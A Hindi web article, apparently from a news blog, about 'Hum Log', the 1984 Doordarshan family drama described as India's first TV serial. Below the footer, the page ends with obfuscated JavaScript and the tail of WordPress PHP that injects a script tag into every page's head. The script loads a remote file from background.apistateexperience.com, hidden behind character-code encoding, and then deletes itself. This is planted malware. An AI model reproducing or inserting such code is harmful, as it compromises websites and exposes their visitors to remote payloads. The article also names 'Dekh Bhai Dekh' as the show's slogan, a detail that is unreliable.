Tuesday, June 25, 2024
spot_img

पहला धारावाहिक क्या आप जानते हैं क्या था..।📺

पहला भारतीय टेलीविजन धारावाहिक “हम लोग” भारतीय मनोरंजन के इतिहास में एक महत्वपूर्ण स्थान रखता है। 7 जुलाई 1984 को भारत के राष्ट्रीय चैनल दूरदर्शन पर प्रीमियर हुआ यह शो एक अग्रणी प्रयास था जिसने भारतीय टेलीविजन में एक नए युग की शुरुआत की।

“हम लोग” पी. कुमार वासुदेव द्वारा निर्मित और पी. कुमार वासुदेव और गुरबीर सिंह ग्रेवाल द्वारा निर्देशित एक पारिवारिक ड्रामा श्रृंखला थी। यह मनोहर श्याम जोशी द्वारा लिखित पटकथा पर आधारित थी। यह शो एक औसत मध्यवर्गीय भारतीय परिवार के जीवन, संघर्ष और आकांक्षाओं के इर्द-गिर्द घूमता है। अपने भरोसेमंद किरदारों और आकर्षक कहानी के साथ, इसने सभी उम्र के दर्शकों के बीच तेजी से लोकप्रियता हासिल की।

शहरी भारत की पृष्ठभूमि पर आधारित यह धारावाहिक भारतीय समाज में प्रचलित सामाजिक-आर्थिक मुद्दों को दर्शाते हुए पात्रों के सामने आने वाली दैनिक चुनौतियों को दर्शाता है। इस शो में गरीबी, शिक्षा, लैंगिक भूमिकाएँ और पीढ़ी अंतराल सहित विभिन्न विषयों को संबोधित किया गया। ऐसा करने से यह दर्शकों का मनोरंजन करते हुए सामाजिक मुद्दों पर चर्चा करने का एक मंच बन गया।

“हम लोग” के किरदार घर-घर में पहचाने जाने लगे। चाहे वह सख्त लेकिन देखभाल करने वाले दादाजी हों, स्वतंत्र और दृढ़ बसेसर राम, स्पष्टवादी और प्रगतिशील भगवंती, या युवा और जिज्ञासु अशोक कुमार – प्रत्येक चरित्र दर्शकों के साथ जुड़ा रहा, एक गहरा भावनात्मक संबंध बनाया। शो का नारा, “देख भाई देख,” लोकप्रिय संस्कृति का हिस्सा बन गया, और इसका प्रभाव टेलीविजन स्क्रीन से परे भी महसूस किया गया।

“हम लोग” की सफलता ने भारत में अन्य टेलीविजन धारावाहिकों के लिए मार्ग प्रशस्त किया। इसने देश में सोप ओपेरा शैली की नींव रखी, जिसने भविष्य के शो की सामग्री और दिशा को प्रभावित किया। धारावाहिक की सापेक्षता ने, यथार्थवाद पर इसके फोकस के साथ मिलकर, भारतीय टेलीविजन कहानी कहने के लिए एक मानक स्थापित किया।

शो का प्रभाव केवल मनोरंजन तक ही सीमित नहीं था। इससे दर्शकों के बीच एकता की भावना पैदा हुई, जो नवीनतम एपिसोड देखने के लिए उत्सुकता से अपने टेलीविजन सेटों के आसपास इकट्ठा होते थे। विविध संस्कृतियों और भाषाओं वाले देश में, “हम लोग” ने बाधाओं से परे एक साझा अनुभव प्रदान किया।

जैसे-जैसे टेलीविजन प्रौद्योगिकी विकसित हुई और अधिक चैनल उभरे, “हम लोग” की विरासत ने भारतीय टेलीविजन की दिशा को प्रभावित करना जारी रखा। इसने कहानी कहने और सापेक्षता के महत्व पर जोर दिया, लेखकों, निर्देशकों और अभिनेताओं की पीढ़ियों को ऐसी सामग्री बनाने के लिए प्रेरित किया जो व्यक्तिगत स्तर पर दर्शकों के साथ मेल खाती हो।

पहले भारतीय टेलीविजन धारावाहिक, “हम लोग” ने भारतीय टेलीविजन परिदृश्य को आकार देने में महत्वपूर्ण भूमिका निभाई। अपने भरोसेमंद किरदारों, दिलचस्प कहानी और सामाजिक मुद्दों पर फोकस के जरिए इसने दर्शकों के दिलों पर अमिट छाप छोड़ी। शो की विरासत जीवित है, जो हमें लोगों को एक साथ लाने और सार्थक बातचीत शुरू करने की कहानी कहने की शक्ति की याद दिलाती है।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>